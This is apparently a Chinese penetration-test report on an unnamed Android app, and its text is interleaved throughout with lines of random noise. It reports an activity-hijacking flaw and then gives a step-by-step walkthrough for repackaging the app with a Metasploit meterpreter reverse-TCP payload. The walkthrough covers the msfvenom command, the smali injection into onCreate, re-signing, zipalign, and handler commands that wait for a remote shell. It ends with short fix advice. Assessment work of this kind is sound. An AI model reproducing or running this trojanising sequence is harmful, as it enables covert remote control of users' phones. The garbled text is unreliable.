G9 X- f. ~ E3 c
) W6 f( W( Z/ E4 |
6 X. M5 F( l6 {7 r
# [9 ] I2 x2 O! q3 E
2 I5 U9 k3 L- g+ k0 m6 | u4 O
- {9 c$ V+ l+ k8 F
7 r ^ Q. M6 E c. ^9 k. n: }
% q! R9 Y1 k8 |
) O5 g! E8 _: `0 O7 ^
) R0 U U5 b/ @ H9 z! W
9 ^$ A7 u6 u" _, u" z 2 检测结果
$ u4 j3 d @+ K
+ X6 I% x; L: ~! t2 w
( n# x; K. X" v: k! H% q
$ F4 o' X! H' V6 @/ d) a9 g
0 D Y3 d- H' K7 O. n8 z% k# B, N+ W) N7 A4 L! A+ B" q4 ?
2.1 某某某
, c% Z' [% G- ~" K* h. a8 J7 `- d3 \! L+ x5 M
! G* _& ?. Q3 I8 ^& Y
! H6 ?0 v! m$ E* D& T: b
) P+ |, z1 _7 S
0 K6 O/ r9 d% J# e k 2.1.1检测目标
- N( q; p" p8 f0 D* e( k( N+ b5 [; D2 t3 C3 A
; |2 p3 ]8 D1 F" ]6 p% R1 ?
9 K; M0 B9 n1 W& I' O4 m( S
( g+ n4 }7 M0 ~9 t+ H4 h- p: h* m6 m( K# k# K9 t
目标地址: 某某某某某某APP 6 ^2 b6 d8 s1 \: K) @
5 _# b! L- ]& a. W3 W: g( r+ @
; A) r% c& E6 V) l5 t
! t! d) E: O6 I4 G
- Y, x2 w, f2 |+ m+ J5 K8 [7 m
( K! g! F9 C: u4 E$ z$ \3 { 2.1.2检测结果 1 i }5 o+ j; F
( k9 f# z: z7 ]/ Y E" \
; o# R S. O5 j- J1 z, Z
; O! s2 W5 U! e i5 _1 | 1 K& o# {4 ~1 I
( |- ~/ {, a* p1 U% J
2.1.2.1 * k" G) z: Y" D- J
4 x# k: n, S3 t4 E c+ L1 P
1 x5 _3 ~( F; i# j( m D
7 ?) h* E7 u; A& F; N3 L/ B 1 v7 |7 v. @6 w& P% i
* ?1 K3 r# ~4 _8 F. S3 K5 T# o3 b
漏洞链接地址:某某某某某某APP : z; s9 g5 g8 _4 I
1 X; m5 w+ E% R: I% Z% l
& R7 @) i8 B! i7 }8 D* _5 r4 l# A8 q
( N n# F$ z K$ E- ]
) M8 b) v* h2 P' L% `) L
, X% w( j u4 q) G y, M2 T2 s
# F$ M7 D; H+ B3 u, x
/ T# g ^" I8 S% K3 S+ z F
: h* P& Y) v) T' L; \4 I+ j % k6 x0 P2 k4 K/ X4 I
' n; O- E! r$ o1 j- C5 I
漏洞分析及取证: ) ~1 P* {3 t6 h
. G, u p* @' P1 i
g& |% o9 [4 u
: Z, d& O& }& t
0 G: w, S8 G. \6 z t* L* i* `! u) R& |2 R
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: 2 J. L( g8 b1 S
2 X- C5 e5 w( y6 T) G2 ?
8 c7 E# ~. n, i6 g
8 P! L! ?" _3 h! z& F' F
. c Q: V/ S$ t7 _" R1 e$ n' O4 y
: j* |& i) k! j3 D9 w) d t: M, e q
1 w" ?+ P/ s8 Z1 e( W! l) o$ n
+ }# @& j" C/ Z3 J3 o! d
. f! |& C+ |4 ^5 V; I6 q( @! P- h/ }
/ `' ?% M0 H" z' T7 j8 K
+ x) G4 S9 ?! F R$ K9 u
# }6 B- J% c) T9 K
- {. @3 W6 w9 R+ Z2 N% ]# Z) J
8 u. h8 L( r6 k8 L
6 O! g" Q. [! X( F; [* F2 N
- B# H3 ^2 |/ \" H: Y
8 j0 c5 P1 f) X* O7 R% O
1 z5 M9 i2 Z, i0 _4 V# o& b
3 }3 w1 A+ T! C6 D' a0 i0 j
4 C' ~& l$ S" {. A! Z
0 l+ m" k# {2 }1 D - l6 m. k: Z6 S: t4 |$ z
9 }$ D! d* Y$ g3 o: p- ?
* c+ O9 d$ X: L% T1 I
& Q* I% I" z ^! a) t( J3 C# `
9 D3 t* d& C& F0 e1 e
& t! w n. s& Z. Q
% M7 s; `$ i; v/ T8 z' l7 r# D$ n$ t3 ?- G8 {2 D! C' M
8 P: C" y2 U. _0 k
3 H1 K3 M1 H' |- ~. K" e4 E" a6 `
2 |' `8 z+ V |4 `; v& a+ g: c4 N' `+ j! F7 o! z, F) @7 K- @
* B5 o) a( K# D& ^( N
6 m+ e, L) \9 I 漏洞危害:高
: T/ V- ` k! m: z* S! X4 q. j9 n; ?7 {2 C7 j ~, ?. U
7 D& W; v. Y8 [# {; N! t {7 b
: P7 K) J) Q: K- P! S # J5 w5 T& o9 y3 K, g% {! F; L& e
9 f+ n" d* o5 i' ?
7 S; o% i. T; ]' u" G6 b! i5 w. h, U! R' [
. o. T+ x) W* f6 o. ^
2 \9 }/ ?) R" [4 d1 X0 E
/ ?. k7 `7 ?, q& }" K; ]* P
) M6 d3 o' ]( ? | $ h3 l- r1 P& ~9 E& m
) a5 }- @% s! Q- \
. v% P. d4 b7 \9 z
# w. ` Q) x& x* j; m8 T 严重程度 ) W( i6 l/ o. z/ |; y# F' @2 T
0 g0 f; c W/ i' t
6 K6 N: a5 x7 p: Z2 v
. X# \3 Z/ N/ d3 T. X: B# y |
! C b G6 W4 o! Z4 K9 w- ^ P! ]
: Z0 |. H( `4 _( A6 @; I
& {; ~8 b2 w% y9 w/ C
! S% o1 }3 z' N: q& W- P* D0 E4 }' V, V$ _( t5 s- x# D0 f/ Q9 l
高
3 b3 R& \% @) a( q+ e' w
# L( a8 O( H: X8 |4 L
, \' l! ^9 Y; E8 t3 M& Z K2 D
, b B. V) D1 C( }- } |
, {8 ~% ^+ @2 y/ A
$ ~5 {1 l& w8 }' x$ R2 E; k! h , T1 {6 A, [( Z- M" V' o, F
+ L: m: @6 ?) Y p# B5 ]7 T
+ {0 ]3 p. N) K$ Q/ [6 n- G5 A4 ^. p- d
■ a/ v& V3 \6 w
/ ~ A. @7 t% u4 e& C
' Q" _8 O2 x( W+ o4 P3 J: M, x3 Q8 J1 a; z2 i! N2 ~
| 8 X% F" u0 s/ O$ E! @# L
- B( d& {0 ]' E( f
7 k" M% t( t. F# j0 w6 v& D+ \# t2 {
2 s! o1 ]7 \# j( h8 m/ z* i! G+ _4 @; o- c: l3 }, T
中 $ h# p* a* ~. b7 F9 m
3 N% @9 A- ]) o' N
2 m% N" k8 N: G% p4 z. Q( w
( @/ @& T' W( ?* P7 c* a
|
4 x( k- V5 [. N; S' m3 m0 d N/ ^ h6 C+ b+ J$ O
( @! O, H, o: `4 c
/ q/ f" N- l$ ^
6 Z2 v9 u$ Q H8 d3 ~! j! D$ d
) { O$ g- P* [& \
6 [; k/ Z, B! W* ~; {9 a; e& y9 K3 X- u* J( D
4 j% r/ k0 {8 t+ C" v% Q( q
1 K$ {) t- O5 G$ s" b1 j4 K* B |
6 l) g( c" |) q) u% l5 T
- { b8 ?. J3 O# X! h: J0 n9 E
# [' D5 k0 @! X! x4 m' g
8 X" `" h; ^. T5 X
4 |) g2 h# @' B# w& a. I, [8 H6 H
6 Y. s( r- D$ s4 F+ i) o 低
) G c4 h8 d- D2 h" D7 W8 t8 Y4 k1 o1 B7 p7 i8 K' b. P: l
$ z- u) ^8 R% e+ F: R+ p
6 `% ?" g c! D2 j8 t# _/ V |
+ w. @$ r% p) U1 x# q% D9 i# R
! U/ a/ u) N# u4 j1 ~7 k5 }
1 u7 l- ~4 p: R. z- d' A& J2 J" N) V
) K) R: s8 ~" y. s9 k5 Q1 ]& h8 F& D
1 t. I9 w, _" x; C" _
3 D' _# \/ y3 l# ?; E ; H) J$ E P2 {" I
6 L$ w R. ^: P( _ |
( V. _/ Y6 d9 k) ]0 d( B7 N" @! Y+ W* U" ]2 L: \/ o
; K% K" \( k8 s: r9 o
. V2 L. V7 p0 E1 B* x : o- e& ^$ `* d3 e
7 `2 {+ P; m$ P+ ^( x1 i* K
5 O3 d `) i" Q6 k, k2 ~' D% P
5 [. \3 R* z4 [( p, i
: K' A: a# U; x, t6 S8 r/ r
3 ]4 l$ u4 Q7 }+ ?
3 B. \0 S' |6 y+ o
" c1 Q& ?% J* a2 R5 K/ B9 m
$ U% e. h0 e1 M) G4 m/ q0 k* a3 j- T, O. ~8 `% s7 S
# F+ U; s3 c8 Z3 X8 H* |$ M' E1 x- B8 y8 [) r7 o, }- d
' J: P. P* {) I
: C* q) g) v9 [% A+ B0 I 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。
: @8 S7 _1 x& ^* O4 s: V, h: K/ }9 b. p) a/ E( c$ G
: A3 A" h6 x# o$ \
: c2 c) S5 j% d! u 5 x; V' ?- Z9 Z0 B0 y
; p8 L1 F: b, ^3 f. ]: n; m4 `
4 [; p( ]1 Y' O* L2 V# M0 X, U5 T* U0 l9 G F. f
0 e( h# H3 f% C L K3 r
% a% f6 g7 s6 ~" e( S 8 u) q' T: r+ K% x7 }' |- z
' O+ s3 r5 v) b( \! [+ z2 O & Y0 Q4 E* B4 }. \
3 E, x/ o$ _, g0 _# Q
4 @# Q) K3 ~3 `. E9 W+ V
+ U# P2 }% N6 r
- m% }$ T. L2 F f7 e2 [( t
: d7 z% y) h8 a9 d1 X& H, d 2.1.2.2 % R9 L7 j& l7 \# e# W
" I4 d6 n3 D7 D$ q3 ^
3 F/ H. O7 a! ?' q, t6 I5 [5 b s" ]0 _8 R) V9 A& ]
' l) ~3 y; D; \+ e3 Q& \: {
b3 K# F) X/ a( K% ?( ?1 E/ Y
漏洞链接地址:某某某某某某APP
I) ~1 p1 Q8 n; Y; A
, Z4 y( O1 J4 T1 Y S: t# `
. G2 A% `7 |. d3 O' I2 j
- S4 `2 [8 e7 @0 D9 S- P1 `
! B9 a! M# v/ B i" `6 ~
2 c. O6 `/ V5 }
漏洞分析及取证:
) |3 _. E) ~* U
, h6 B# V. o% E; k
, P* y0 X# y1 P+ I [ e
, t. W% ~1 D; L6 B; G f
6 _6 J1 L4 K( Z; t* d# S% Z
8 n( {) A% k l* m* u% Z: { 通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: , B8 Q! F8 ~' K7 A P
0 {- h8 [, q/ Y/ A
: E3 y- B% L X: X2 F% m ^, a
$ [3 e8 m$ s: e2 A
5 W; U) w U3 M) j1 y0 t: X" L
7 J8 ~$ t' H0 n: \+ J, O& ~* K
用Metasploit 生成木马 apk 9 s$ N4 j- m6 {0 a6 f
2 w8 M6 f" [( g: ?' B
/ t$ [" `% x5 l; z( w0 s- D
. q. N+ C! a& r' z/ [! x 4 V: X- C- p) H/ k2 X
: |' A a2 G' _8 Q) O( u
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 6 ]) z' H' v8 e' [/ J, T' z: ?. f
; e( u! Y2 U `$ p; c
. o; i. |) m9 O/ Q- K5 k8 c6 C; o8 X9 N b$ J. J
4 \# |. g+ V/ ^% a
9 b- e( _+ y6 w 反编译目标apk和木马apk
- x/ W; E( h# f/ o: M0 B' W' w" y3 E) c6 X1 s7 T
4 t& I6 \7 `& n- v1 w4 k3 l$ X* Q1 G9 T+ v2 o/ ^1 i0 H7 w; N+ h" o0 V
$ p& r! t- l! f1 s. N; O. ^- q
+ _$ I+ B" q y apktool d target.apk
3 J, g6 t% ]1 G) H, ~4 s
4 f7 [7 h, v. B' m3 B apktool d cockhorse.apk
& _0 w( O% Q/ G) c2 r g( i
- ]- I% d$ d' }( w' s
# y3 i' x) Y0 w# _7 x
; z0 r% u) D* ^% O( ], `1 ]8 _
3 T) r0 M6 I- s4 L$ O m& W# d. G$ Z; _/ b! N8 ]. H6 Q, L* l0 L
木马 apk 注入目标 apk
. Q' g: {4 g P0 e6 C/ H
* A6 t6 S& M7 B C- h4 A" ?/ s+ {$ v
, R$ G7 V5 D2 b
; R) ]% u8 S5 r- K
! E7 ~: |7 @5 o2 \3 H4 o* n6 D
# Y: }4 B/ [6 R 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
Z" V9 w, U8 W0 _
: A3 }$ \: b2 S% E3 h invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
% E4 l* Y% O7 J# r, v, i+ c3 h4 w. w9 G' g- g. r1 K
8 r1 p1 r! c$ ?+ u4 k
- \' q4 B: Q7 I2 Y0 j
' P" y2 H* `0 Z: m
k& H, S. o4 t2 g' @4 K
将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复
& h" ~7 E2 v `6 w4 Z0 w# M5 ?: E5 y7 }0 W$ i5 X
2 `4 h9 Z, Q, Y! c p! \! s' b. n C+ Q6 h
6 M+ C: e5 O- T! K7 r
- k0 w; O; V- I0 |% y 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下
( @/ U' f- K L7 o8 \) a+ \" U! R( I2 K" c: O
: I+ d. L& C' S1 e* F
" G# a6 N% B# e0 F. y2 f 5 Z4 B% x$ i5 T9 z* k
3 {) a. E. r$ `) C 回编译生成最终 apk
( Z( ^. Z/ N2 [/ Y2 D& [% \/ p) u7 g3 l) `2 l# L- G3 i
6 x+ a; m! d6 g5 J& k5 D
& n5 C6 y( a1 B/ A
# S' u4 U, C& h8 y7 r! D9 h( ~6 l6 U- _! G9 X
重新打包
1 H5 O) g( R( Y* m L# ?# u- b1 R# J" M# E3 u
7 Y+ ?1 W( _' C' x8 V
7 d4 ^! @8 T, c5 A
! y. ^* U( y3 M' n2 H8 M* }. s z# j) N7 ^& \
apktool b -o repackage.apk target_app_floder
2 g: T o: Q. Q& x% {) E, V7 L+ b9 W3 i9 L
8 w6 [, e5 b/ ^9 o# q) }. S3 Q
+ l1 O' E$ m c0 Q
* \% T4 D& \* N; h# p9 W' `7 z
创建签名文件,有的话可忽略此步骤 4 P1 _$ d$ b2 A2 T5 k4 X
* ~, k* c& ]& G+ G P5 @
; R+ B- u* B4 i
" }) H1 r( H& [2 e% y2 Z* a ( N% N) L; h: S. y2 U
' R1 j8 E9 `% ?5 B keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
& V% y% b y7 C7 Y
# `7 I) B% N" G9 Z
9 N- L' ?) Z* k [/ c. B, b
7 O/ S! f7 d0 N d/ V- B ( l' r' m7 @) b0 k, v/ x5 B: l
' \ i9 ?% @* A
签名,以下任选其一
7 P/ R/ W3 J- ~9 W% y# J: N0 d$ H% ? n7 V
" t$ `1 {5 h$ k O. f" r* |
5 n, o' w, I% B7 |6 Z3 @ 0 ^! i, u) }1 G v5 P3 ?! K
" d& q* z y) v% @: V% I) W+ a jarsigner 方式 ) i' ^2 X( ]2 Q) A" N
$ n7 `% v1 b! r0 L q
+ S- ?) H+ A2 h5 L3 a Y- z" ]& N8 F4 I4 \) O% y a6 R
& |$ o( L/ m2 g' q, T
r4 Q: @* Q/ a: C( H jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname
: v. _: L3 Z8 E- N5 ^1 k; o8 E1 f5 j& ]+ R0 p1 O
3 V2 \: G4 i1 a9 U# K- E
7 F) N! c7 U5 n3 i# O& L
6 }; a, c7 I. U3 b3 J8 v7 X5 p% X' M! V8 y6 U% w4 N( z
apksigner 方式
# n. \7 ]" ]. a: i1 X. x5 ?2 ~! d4 E6 z# a
: ]+ g* C+ u7 _+ N" w& F6 L. k
& E A# M9 L ?1 B8 c 0 r8 V7 b6 ]9 L* t6 {1 ^1 m
: r8 q! _1 t# h apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk
8 ~4 e5 |6 E4 L( T% r7 T# }- g. y
2 g `7 u+ |8 d3 B
( L* a' ?# P) _7 P& h8 T, D1 \( p# N7 S4 M: X" T0 {8 G
% Q2 T% \+ S% Q B' N% w
1 ^& I9 a: x8 k# p 如需要禁用 v2签名 添加选项--v2-signing-enabled false
1 g3 B0 T5 [' T4 J1 x1 \
# U7 C! T9 s7 x- z
4 ^5 i7 n7 Y! N6 i
7 t5 n+ B1 `$ @; c `2 }$ q3 J% n) Z
4 P5 ?$ @4 k9 S3 {0 H$ m
验证,以下任选其一
$ B0 f+ ?4 m, q- Y; a, @# P) l" q) X; M- \# H+ ?* {
! A. A1 o. O$ I
[! p ~- y" l7 U5 ^
E; w, N# C% R! c; `8 a" p/ y. y- u( @% C
jarsigner方式 + ~- y! h; e1 `) [, Q
/ u7 W8 L; c4 L3 P/ B/ y% y
# a& ]2 x8 | y
' V- @* m( }/ q7 C6 i" |
/ L1 b- k( k4 `3 E
: g% g" ^4 N$ }+ I. } jarsigner -verify repackaged.apk
- ^8 ]) p7 n9 B- Y
1 q z8 u }/ q4 ~" A; w1 X [
" }/ T: z9 @* F4 {5 }6 K: |! V. W* e' D/ Y0 e( l3 P
9 \( y% j! r, O- b2 k
) ~1 k7 K" B* F4 n5 V8 b apksigner 方式
5 J' O2 b" `7 _9 E8 T t9 a( m# F7 E8 c4 C/ p
; I0 n2 ^$ _" Y" O& i9 U
% J! f; Z/ d! V2 _ 1 O, v& w" k' M% E
5 L8 i2 g" Y" [/ J2 G3 [
apksigner verify -v --print-certs repackaged.apk
$ t+ V3 @3 T( Q$ Q9 n8 w0 F
) j& p. q$ w1 H
) ?. a9 J: z) `: K0 X
7 ~# c- O& R( @, s/ w; _5 N
6 V6 Z0 u6 L: @2 l i) P: Z3 `
/ M1 s) g' a" V& l& f3 T( c
keytool方式 0 F5 b0 N6 z* e+ G4 i9 \
, Z& {; |% e3 s9 d$ z! B1 z
4 K/ R* d6 ?4 E" w) Z! e
% W( V, x* u# \% Y$ j
U9 r8 Z0 t3 K( M$ m) _3 J/ J' e; ]4 N- b9 V( c q
keytool -printcert -jarfile repackaged.apk
6 T/ @; h4 n2 z6 Z1 B
& y. ~, v! u* t( S* ~7 W, X
2 m, X! ?- H$ Y8 F/ h' S
- C3 p5 U6 y8 @9 d% @
0 [7 `- T! [, C
: ~# f; O: u/ r; O/ r1 W 对齐
. \" n8 ^4 \! _7 z5 ~0 A* w5 W+ l1 Z" u5 Z
: q# h+ C, ^* ?; W
3 v0 j# j7 P# ?+ E8 b3 t ) |1 o6 q3 X+ H7 N
" X( X0 l# o( C! \4 ^% r
字节对齐优化 ( o8 f! J" d: C; _ q
) F3 ^) r* H8 c! n
" T" \7 u' Z5 ^- V5 m3 a/ J( |5 Z, K* b+ _: T# v/ n* i( L2 @/ F9 \2 N
1 ~) R4 v9 a, ?3 e6 c; Z
) a; E% B: C7 z* ~6 q
zipalign -v 4 repackaged.apk final.apk : `# N* k' V0 z! A& n* y
1 a$ @% b% j4 R& {* i
! _4 B {+ Q/ j+ h/ k
. l+ j# C# H: R/ p2 ^ 2 e$ Z# b* i( m- \6 q
* o+ ]# z% N+ r$ D6 j
检查是否对齐 0 ?! S) e" f7 d7 n% M, z; h
+ L- Q2 b( ]7 j% n% x: S
1 f; S, k( t3 Y/ i! j; [6 j2 }* B
, s& x* ~* l* P) F6 f
. z0 K6 o+ Q2 c8 h" P- K( Y" P
! Y7 A) z J8 b: A, y6 N' M* q+ X zipalign -c -v 4 final.apk
; L; r: D2 v( ~3 |- F1 C, d+ Z. d, c. X% a3 I" S' ]
& U5 b2 _, H: T$ P A0 I4 b" Q$ V& K5 c* x, `
4 y8 R/ ]& g P. ]3 ^% M
+ s3 l% X& h. o2 L9 U
注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 * g# [1 l% f$ j* L- H% c
8 R: J4 c" h+ D' O @. d
6 z( r9 ]# T; ]; a
& L* G6 j, r) I+ F" o
r: M e0 b; D2 {" l. X2 L8 o p
8 d5 `& ^3 O) q7 T 启动Metasploit控制台,配置参数等待上线 5 ]3 n2 M% p+ m+ F% g
. X1 P' F- c7 e6 @7 v3 C% t! O, ]
0 V5 q2 |5 y* {8 V4 l
7 M( n8 l% V' w& a7 o- t % u1 t5 P5 a9 [* N
# g* F% w3 j/ q$ P" j% m 在终端依次输入如下命令
N& `! O/ P( H+ W2 Z& U" a; ^5 ^8 H; G9 w3 P
2 M! j4 {) ^3 [( g( a9 k- e4 y. r6 `- ?
2 O4 U' Z; i+ ]. I" G( Z2 b& w- W9 }. B; X
msfconsole
3 P% l: N, G2 ^9 H1 U" i O5 i! M
; u- i3 h( o, A# H
$ R, N. @& g9 i% O; e2 P; o
) u; p: A. v# z! I. e
, l. [" j7 z- S8 B4 N2 R
$ ]3 I! f( i! I- C/ y use exploit/multi/handler
3 q4 v. k! {/ I7 h4 D
% P( x2 z1 {& L6 U- I' V+ `
d S, L0 B& W, ~' L% [
4 m* _' k' J7 }5 r! T / G: t7 ]4 S' t0 u
2 ?. E3 G) ^' e' T; o
set PAYLOAD android/meterpreter/reverse_tcp
! r/ K% y0 b, C8 d/ `) K, p5 k/ m
: q( w6 H3 e# P; W# u' Q
" u4 h9 K9 @% b! u) d/ [; y+ \3 V) w) O+ z0 K$ X
0 h4 r. _; X1 L% _8 w, l1 s2 d
) M4 C4 u- v9 f# h
set LHOST 192.xxx.xx.xx 8 Q& T( `2 g, g# h2 S
& y) H2 s0 |- G- p
0 y0 l. u/ o! Y+ H1 {) {
I' V9 X" O0 ?6 e8 `+ G * e. d! S$ H- _; s3 }
# q$ N; i! |4 C2 f: R1 y! Q. D set LPORT 4444 5 ` J, K8 w/ X6 ^# h! e. [7 H
' E& m) i" R3 W9 }$ \
$ E! w! }) e# |5 _
2 M" E) ?* r4 J! e# L1 C/ {! v- I
5 g+ [3 l4 g' K7 c g
* h+ E; q8 v+ I exploit
9 Y1 _9 \9 `8 w4 c _4 `* v! f
4 |4 H4 @$ d1 u" [& t% m: w
) D% F6 C7 g+ }" B+ t' v+ e& J7 l
?1 U0 l2 J2 G- n/ q& I
0 ?* B& O) L, X0 J, {. N& H
) P: N7 R% F2 b3 h: h1 f 之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:
( u+ \2 h. e' |$ K n
" V! \, U+ c G& M
1 b' R% I. d; ~
{% [- ?7 y( s8 P r& S
/ ?, V2 [' x: i4 T, j/ P6 @* A1 x7 m) G. k
漏洞危害:中
- ?8 S: a8 j+ X- @6 b8 E/ } _1 c( n# G2 _5 E, J# k
( P9 W( ^* H7 \" `% @3 s5 D
; I& B8 C/ c; X$ ~$ `4 U
1 Z0 w2 z7 e) Q p8 j/ O- i6 ^2 g/ C1 w) O
5 k _0 a; C! G. `. R
$ S5 v1 Z0 X! e: O ; [% k3 Z. ? r& ~% }
9 O: ]7 X; N+ i" _1 H. ^$ A: w
! I; g K; P, }% f9 S& W- q" W/ e" {3 ?0 z: j
' ]/ g2 i+ }8 S5 a) w9 ]5 b6 ^2 E2 Q: R9 w* x# \' j$ V; S
|
) |1 P, o; O, A4 T& Y
5 r: w* R8 x& f) c+ |( X* ?+ m# K8 \6 } . Q# L: a/ H1 @$ C
H$ v; @' c2 s8 b 严重程度 ( }7 V5 u0 b' L4 V
5 g' E. L+ X* Z4 n% t- r$ N
7 r7 }/ o. @. ^# V3 Q
* o4 @/ p& v4 x g- b: a$ X# Y | & J. B& Q, [& w* L; {, ^8 x
, H* d) k% u& ^' _8 ]
) ?# _; |) s0 x9 T# V9 j4 n
0 i! K7 ]0 @( t6 H5 n $ K$ {$ L% b0 |/ w& @
& _& G8 E$ r5 m4 o, q3 M
高
: r% S/ n& |9 H Y% K& s/ u! j' [: h" R+ ?2 y
( Q' c2 p- L$ @3 ~- A: j9 u
: D: q- b" P" n( B4 u |
0 y- R( I5 s' c& b U- a! q/ o a! c, ]1 h- K
: A. ~5 V3 n) q& U# u
- J# f, y- W& s. L
6 ^$ v6 _% j; j7 b* _$ v
( f9 n- h" Q+ p
■ / T7 c7 z' e+ S
& D% U7 I+ b3 r$ s! y3 N7 Z) U
" _- e' r2 n$ X+ W% L
: U G. k8 X7 f! z; R | 5 L% [8 F3 r. S* R1 S8 r+ ]* u6 S
; i# D! k, e' w3 v
7 r6 W2 Z8 s' Y' l; o5 a$ \) h
7 S6 x" u# p1 \) v( `3 a
. {, _. g3 X* T6 Q
+ ~$ h2 i7 }+ Y5 _
中 ' y, @$ ^; U5 Q9 ]6 I9 ~6 R- X6 `
! o) ~; u2 C w& Q) Q
; I, A. w4 b6 P% u# a
- B7 H. j7 k5 Y) K! l3 D |
% \/ [3 @, W g; G( D. q
4 O, A( Z5 v: b H- |+ h) w " y4 P; H. D" p# X9 x
% }5 k* A5 |2 e7 |" ` r0 D
) F5 {" Y- d0 b% C" ~1 d2 h% A% `
. f# G3 ]% j" |; u- {
9 T. Q" K% u, w3 g% Y+ A9 z " D D- Z" a# S# t* E& |1 t7 C
1 Z( P5 c* r/ A
( ~% M& ~) V: E' O
6 J7 ?" Q* Z* H2 a |
; H7 Z3 @+ m' A3 m; |9 U( p5 Y: R) C0 }2 f1 O' I
: X) z7 a- k$ N0 L. i H, E- S% `
: Y( Z: d5 L4 J! ^ 7 u, h: h2 X5 k& `( b) z$ V
' q5 q3 |' X, T; ~8 s 低
( J9 H9 I" f* V3 l
' K$ B4 k4 Y- E( H& F
% @' V) h. }; U% a- V
0 [3 G: w& I! ^; S | 4 A4 w! f9 @$ D, E
8 ^' U: Z. J. V 6 i& C5 C# T7 M: L; ^) L
8 E: z* R( a* L+ X' J: ]4 U; r* @ ) t9 a3 `/ Y- c- Y3 r$ p9 B
9 C2 u1 I i" T' v
* k+ I& u9 K0 J) P
! i& a1 [* X. a$ M2 y( ^ " S% ? a" g. [* b) C$ Y- y
! a, I, `1 r. V
7 k# E$ o) `- ~# y3 U, Z j+ ]
' I2 c' X/ e/ t0 h* k# L0 i# `
| : N, [! n u* V2 T& f
( M( Y# y: T2 p* x7 @7 @6 w
# z8 _% m' y/ b' g* T6 g/ f5 F/ `2 W9 }* O& w
4 j2 R5 a, ]8 ?( D' g0 X
" k7 d8 `# b+ ?3 [2 F
5 K& r" j9 `1 d t
; i* `9 H: z, H" l 6 Z4 ]+ @2 `9 [7 g
2 F/ ^' x* L' V1 Q# ~: n1 H7 _+ p
$ }6 w, P. h* M& |# }* ]7 T
Z1 O% V R) D! [' I) U
' A0 S2 m; c, r! d: R
* H* [- x5 ]6 Z$ M) F4 i
1 \( S. y9 }9 C0 r+ L
2 ?7 m# q- X0 ~9 s3 S) [2 a3 q5 R! [
4 P$ ]1 c$ t$ ?; R e4 ?
3 S3 g; v7 A, z1 t# t: ] 修复方法:
' Z q3 e1 E% U6 y2 g$ B; m
/ P$ K& B5 l0 f% S9 T: r
8 l. F9 i. l1 W ]5 j2 K1 G
6 h; W" e) L( [) Q
2 `0 m0 m1 o) e' t) B/ M
* W* T1 S$ ^5 j1 c 1.在 APP 启动时应做签名校验防止二次打包。
% A# e! V7 n" @2 j/ _/ _. Q3 r& y2 i2 M
2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 , h' A0 A6 C4 g; [$ t
) L' L6 L- I6 ~2 S x" T& [
0 q& {8 @: s( |5 n/ I; n( j ~
/ h+ n& T7 {6 F& _ q+ e+ C ) k" F( M z! p$ u' H
, v" M+ g' |/ H! H8 { - K/ I0 I* _5 G( Q3 G1 I( K: a
D* g$ |- B! k. T, ?, N
, ^5 V. c, }( t
! K) _$ d4 X2 `: l( @; i7 M. G
. h2 G6 C* t7 P; A. `3 y, s# D- ]% |: L: P5 B
7 d. N, o( S: I1 y) A" J: `; J/ r! E
4 O4 s/ m2 R1 h/ l# A
: Q' z) [! v! u& w
* A% X9 N) q3 J7 X& P
8 f! P. _& T3 c1 X0 p$ C# W; r. Y
* Q( Y8 f$ H/ B* U [0 l
% O' l8 o; n4 m+ Z